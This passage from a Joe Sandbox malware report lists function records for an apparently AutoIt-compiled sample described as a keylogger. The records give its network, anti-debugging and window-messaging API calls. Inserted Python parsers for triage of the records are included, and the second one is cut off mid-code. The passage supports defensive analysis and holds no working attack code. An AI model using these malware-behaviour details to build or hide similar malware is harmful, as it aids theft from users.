                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: 5c36348a12e476d2d283e72d165075482bf8de96c813568faf7c55303ee4c590
                                                                                                                    • Instruction ID: f407ce0dbebf4e25f2c4cbe078ff83238b789d8a100743dc9555695e387b748c
                                                                                                                    • Opcode Fuzzy Hash: 5c36348a12e476d2d283e72d165075482bf8de96c813568faf7c55303ee4c590
                                                                                                                    • Instruction Fuzzy Hash: 00118E32901114AFDB3BDB98D844BEB77BCAF49310F164021E859E7290DB70ADAAC791
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0032222C
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00322255
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: 78318e4db39e852682fa8e9c7d8992b574de97a627c047ad3ac1daa9f205067c
                                                                                                                    • Instruction ID: 5aeb8970a1b669e98be8ec08784f16682579e68e0d4e9becd940fa17fd0065b3
                                                                                                                    • Opcode Fuzzy Hash: 78318e4db39e852682fa8e9c7d8992b574de97a627c047ad3ac1daa9f205067c
                                                                                                                    • Instruction Fuzzy Hash: 2711A070541335FEDB2A8F51AC85EBBFBACFF16751F10862AF91546400D2716990D6F0
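The entries in this list are the Joe Sandbox IDA-plugin records for individual functions in the image mapped at 002B0000: the API calls the plugin resolved inside each function, the string the function references, and the per-function opcode and instruction fuzzy hashes used for similarity matching. Most of the entries are generic Win32 GUI plumbing (ComboBox, ListBox, edit and static controls, menu items); the pair of WININET calls directly above is the one function in this stretch that can reach the network, which is where triage of a keylogger report should start. The following parser is an added example, not Joe Sandbox or sample code. It reads entries in the plain-text layout used on this page, strips the "Download File" link label that extraction leaves on the Associated lines, pulls out the resolved API calls (including the "Part of subcall function" ones), names the SendMessageW message IDs from a small table of standard winuser.h constants, and flags calls into networking DLLs. The sample input is assembled from lines on this page; the set of DLLs treated as "networking" is the example's own assumption.

```python
import re
from collections import namedtuple
from typing import Dict, List, Optional

# Constructed sample: two entries assembled from lines on this page, in the
# plain-text layout the report uses; the "Download File" link residue is kept
# on the Associated line on purpose so the parser has to strip it.
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0032222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00322255
Strings
Memory Dump Source
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• Instruction Fuzzy Hash: 2711A070541335FEDB2A8F51AC85EBBFBACFF16751F10862AF91546400D2716990D6F0
APIs
  • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
• _memset.LIBCMT ref: 00312A22
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00336761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0033676C
Similarity
• API ID: MessageSend
• String ID: Combobox
• Instruction Fuzzy Hash: C011B271210208BFEF268F54CCC2EEB376EEB493A8F518129F91897290D671DC5187A0
"""

# One resolved call line: optional "Part of subcall function X:" prefix, then
# Name.DLL(args) and the call-site address; LIBCMT lines carry no argument list.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<dll>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)

# Assumption of this example: a function that calls into one of these DLLs is
# network-capable and is the first thing to read in a stealer report.
NETWORK_DLLS = {"WININET", "WINHTTP", "WS2_32", "URLMON"}

# Standard winuser.h constants for the SendMessageW uMsg values seen on this page.
WM_NAMES = {0x030: "WM_SETFONT", 0x0B1: "EM_SETSEL", 0x143: "CB_ADDSTRING",
            0x14E: "CB_SETCURSEL", 0x180: "LB_ADDSTRING", 0x182: "LB_DELETESTRING",
            0x1A2: "LB_FINDSTRINGEXACT"}

ApiCall = namedtuple("ApiCall", "name dll args ref caller")  # caller: subcall address or None

def parse_entries(text: str) -> List[Dict]:
    """Split the report text into per-function entries; each one starts at 'APIs'."""
    entries: List[Dict] = []
    cur: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"apis": [], "fields": {}, "associated": []}
            entries.append(cur)
            continue
        if cur is None:
            continue  # text before the first entry
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur["apis"].append(ApiCall(m["name"], m["dll"], args, m["ref"], m["caller"]))
        elif line.startswith("Associated: "):
            value = line[len("Associated: "):]
            if value.endswith("Download File"):  # link label left behind by extraction
                value = value[: -len("Download File")]
            cur["associated"].append(value.strip())
        elif ": " in line:
            key, value = line.split(": ", 1)
            cur["fields"][key] = value
        # anything else is a section heading (Strings, Similarity, ...) and is skipped
    return entries

def decode_message(arg: str) -> str:
    """Name a SendMessageW uMsg argument; '?' means the plugin could not resolve it."""
    if arg == "?":
        return "?"
    value = int(arg, 16)
    return WM_NAMES.get(value, f"0x{value:X}")

def network_calls(entries: List[Dict]) -> List[ApiCall]:
    """All calls into a networking DLL across the parsed entries."""
    return [c for e in entries for c in e["apis"] if c.dll in NETWORK_DLLS]

def summarize(entry: Dict) -> List[str]:
    """Readable form of one entry's calls, with SendMessageW message IDs decoded."""
    out = []
    for c in entry["apis"]:
        if c.name == "SendMessageW" and len(c.args) >= 2:
            out.append(f"SendMessageW({decode_message(c.args[1])})")
        else:
            out.append(f"{c.dll}!{c.name}")
    return out

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        print(e["fields"].get("String ID"), summarize(e))
    print("network:", [f"{c.dll}!{c.name}@{c.ref}" for c in network_calls(parsed)])
```

Run as a script it prints one line per entry (string reference plus decoded calls) and then the network-capable calls with their call-site addresses. To apply it to a whole report, feed the text of every entry block to parse_entries and sort the results so the network_calls entries come first; the Instruction Fuzzy Hash field is what to compare against other samples when checking whether the networking routine is shared runtime code or payload-specific.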
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002B3C14,003752F8,?,?,?), ref: 002C096E
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • _wcscat.LIBCMT ref: 002F4CB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                    • String ID: S7
                                                                                                                    • API String ID: 257928180-3441049348
                                                                                                                    • Opcode ID: 2764b1578a8cf786d1d1e51546cdeedf8798bd6dc8e707eb6355bea5c7553c51
                                                                                                                    • Instruction ID: 684deff57e325bc6b79a7eb47f3464fd813364731ea3406db5e32155128bb176
                                                                                                                    • Opcode Fuzzy Hash: 2764b1578a8cf786d1d1e51546cdeedf8798bd6dc8e707eb6355bea5c7553c51
                                                                                                                    • Instruction Fuzzy Hash: 9011A934A25609DA9B51FB64C846FDD73E8AF08790F0045A6B549D3191DAB096A44F10
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00308E73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 117f774ebe20be276f7aba3b5fffe7e9d6408c7011ad184604153cf2b37f11ea
                                                                                                                    • Instruction ID: f57bc1dcc13d73d5d93bc2d85deb687e1eb743c6192a934aeb6c5e96965591a2
                                                                                                                    • Opcode Fuzzy Hash: 117f774ebe20be276f7aba3b5fffe7e9d6408c7011ad184604153cf2b37f11ea
                                                                                                                    • Instruction Fuzzy Hash: B8012871716229ABCF16FBA0CC669FE7368EF413A0F440A19F8755B2D1DF315818C690
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00308D6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 5828a27b7eac2455cf5e7796ab9a1de7956efef11572c49609ecbe3e9c082572
                                                                                                                    • Instruction ID: 140b8928471a515d2e289a7997f537db076f416d9e7e500afd779b49ec32f69f
                                                                                                                    • Opcode Fuzzy Hash: 5828a27b7eac2455cf5e7796ab9a1de7956efef11572c49609ecbe3e9c082572
                                                                                                                    • Instruction Fuzzy Hash: 4701F771B42509ABCF16EBA0C966EFF73ACDF15380F540119B841672D1DE105E18D6B1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00308DEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 33efa4628bcc809c28a3124502a4a0274d44a931332029c5f19e424bb4ec48ed
                                                                                                                    • Instruction ID: d735947e6e1fdb61630f7ac2562c02b13d9bed4c5d15b9b9880825384d2d6e14
                                                                                                                    • Opcode Fuzzy Hash: 33efa4628bcc809c28a3124502a4a0274d44a931332029c5f19e424bb4ec48ed
                                                                                                                    • Instruction Fuzzy Hash: 0F01F271B46109ABCF12EBA4C962AFF73AC8F11380F144119B841672D2DE218E18D6B1
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0030C534
                                                                                                                      • Part of subcall function 0030C816: _memmove.LIBCMT ref: 0030C860
                                                                                                                      • Part of subcall function 0030C816: VariantInit.OLEAUT32(00000000), ref: 0030C882
                                                                                                                      • Part of subcall function 0030C816: VariantCopy.OLEAUT32(00000000,?), ref: 0030C88C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0030C556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                    • String ID: d}6
                                                                                                                    • API String ID: 2932060187-3853789388
                                                                                                                    • Opcode ID: d31a5a7c9ca550e28d2f2534872f3e865428aeb1a2818a0016fa70725dab9161
                                                                                                                    • Instruction ID: 4e1e86ab57e67da097bfc992838d9179a5cdcc24ed7830176f9aa40daec52d7d
                                                                                                                    • Opcode Fuzzy Hash: d31a5a7c9ca550e28d2f2534872f3e865428aeb1a2818a0016fa70725dab9161
                                                                                                                    • Instruction Fuzzy Hash: A8110C719007089FC721DFAAD8C489AF7F8FF08354B50862EE58AD7651E771AA48CF90
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                    • String ID: #32770
                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                    • Opcode ID: 5a9a7916789ce0425b6d7c53db1e05ea5f104ee9c9b64c699eabd2d8c55db938
                                                                                                                    • Instruction ID: ee07fdea90e6c6acfeb1c470b66e6ae3835e888da6b1adf580a22ed3ee3ce307
                                                                                                                    • Opcode Fuzzy Hash: 5a9a7916789ce0425b6d7c53db1e05ea5f104ee9c9b64c699eabd2d8c55db938
                                                                                                                    • Instruction Fuzzy Hash: 08E0D832A0062C2BD721DB99EC4AFE7F7ACEB49B70F010167FD04D3151E9609A958BE1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002EB314: _memset.LIBCMT ref: 002EB321
                                                                                                                      • Part of subcall function 002D0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002EB2F0,?,?,?,002B100A), ref: 002D0945
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,002B100A), ref: 002EB2F4
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002B100A), ref: 002EB303
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002EB2FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                    • Opcode ID: 9648a81065d9f7f5b926b21b382e2e7106d57c8f8b046cf6c7c126c159104f30
                                                                                                                    • Instruction ID: 5cb05fb0736a4fd0f513d8b8a1078c3e66df5852470fa5f573c42437b19b322c
                                                                                                                    • Opcode Fuzzy Hash: 9648a81065d9f7f5b926b21b382e2e7106d57c8f8b046cf6c7c126c159104f30
                                                                                                                    • Instruction Fuzzy Hash: 35E06D746107418FD7229F29D5457877BE8AF00714F408D6DE886C7661E7B4D458CBA1
                                                                                                                    APIs
                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00307C82
                                                                                                                      • Part of subcall function 002D3358: _doexit.LIBCMT ref: 002D3362
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message_doexit
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                    • Opcode ID: 4afe432c09fb1c975e1fc7cd5c12272b7454fee87486f2d6cb11c5042bae8027
                                                                                                                    • Instruction ID: 5e74cccab9b874e9fd8584da10d36083e8e6f128c7c4515fee9d39d406f4bc21
                                                                                                                    • Opcode Fuzzy Hash: 4afe432c09fb1c975e1fc7cd5c12272b7454fee87486f2d6cb11c5042bae8027
                                                                                                                    • Instruction Fuzzy Hash: 81D02B323C431837D10632B5AD47FCA36884F04F56F004412FB04591D349D15CD051E5
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 002F1775
                                                                                                                      • Part of subcall function 0032BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,002F195E,?), ref: 0032BFFE
                                                                                                                      • Part of subcall function 0032BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0032C010
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002F196D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                    • String ID: WIN_XPe
                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                    • Opcode ID: 9ca46a1132c15bd584500cd3768c526e48c5d76daba3440488bae2f94987c546
                                                                                                                    • Instruction ID: a5fd8be207b7fbd91cb2f29793898244512ed08212f85a08633764bbdb90e247
                                                                                                                    • Opcode Fuzzy Hash: 9ca46a1132c15bd584500cd3768c526e48c5d76daba3440488bae2f94987c546
                                                                                                                    • Instruction Fuzzy Hash: FEF0AC7082010DDFDB16EB55D994AFCF7B8AB58341FA400A5E106A6090D7754EA4DF60
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0033596E
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00335981
                                                                                                                      • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: 78c3b6e5ab7d116a177753396dd4c597ce1b69491cd7b47f45fd0b8be3c6b899
                                                                                                                    • Instruction ID: 9290eb26b6721521f79b580a02d9f042cee6bb5ae4b05cd7cc97deb1884bd060
                                                                                                                    • Opcode Fuzzy Hash: 78c3b6e5ab7d116a177753396dd4c597ce1b69491cd7b47f45fd0b8be3c6b899
                                                                                                                    • Instruction Fuzzy Hash: 29D0C932784711BAE669AB709C4BFD76A18AB55B55F000825B34AAA1E0C9E09800C654
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003359AE
                                                                                                                    • PostMessageW.USER32(00000000), ref: 003359B5
                                                                                                                      • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: f8d7bbae9b9d85b2e328e6e2bb92bda3b1e3cf34b3b7ba19e27ea1c8c2de267a
                                                                                                                    • Instruction ID: 93a48ae3f5d9184222b82ad32bd78015eb72ad2f7ba19d597d11a19d8b8a5b6a
                                                                                                                    • Opcode Fuzzy Hash: f8d7bbae9b9d85b2e328e6e2bb92bda3b1e3cf34b3b7ba19e27ea1c8c2de267a
                                                                                                                    • Instruction Fuzzy Hash: 7BD0C932780711BAE66AAB709C4BFD76A18AB59B55F400825B346EA1E0C9E0A800C658
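The function records above are the Joe Sandbox IDA plugin's per-function summaries: direct API calls and calls made through sub-functions, string literals with their xrefs, the memory dump the function was carved from, and the similarity hashes. As an added example that is not part of the report or of Joe Sandbox's tooling, the Python below parses records in exactly this bullet layout into structured objects and then runs two triage passes a reader of this section otherwise does by eye: it lists functions that call debugger-detection APIs directly rather than through a sub-call (the CAtlBaseModule record above calls IsDebuggerPresent and OutputDebugStringW itself), and it decodes the numeric uMsg of SendMessageW/PostMessageW calls, which is how the 00000111 posted to Shell_TrayWnd becomes WM_COMMAND. The sample input is two records copied from this page and abridged; the anti-debug watch-list and the message-constant table are the editor's own additions, and the regex assumes the plugin's layout as rendered here, including that a sub-call is written "Part of subcall function <addr>:" and that a call with no visible arguments (such as _memset.LIBCMT) has no parentheses.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two records from this report, re-typed in the plain-text layout
# the Joe Sandbox IDA plugin emits. "APIs" opens a record; indented bullets are sub-calls.
SAMPLE = """\
APIs
  • Part of subcall function 002EB314: _memset.LIBCMT ref: 002EB321
• IsDebuggerPresent.KERNEL32(?,?,?,002B100A), ref: 002EB2F4
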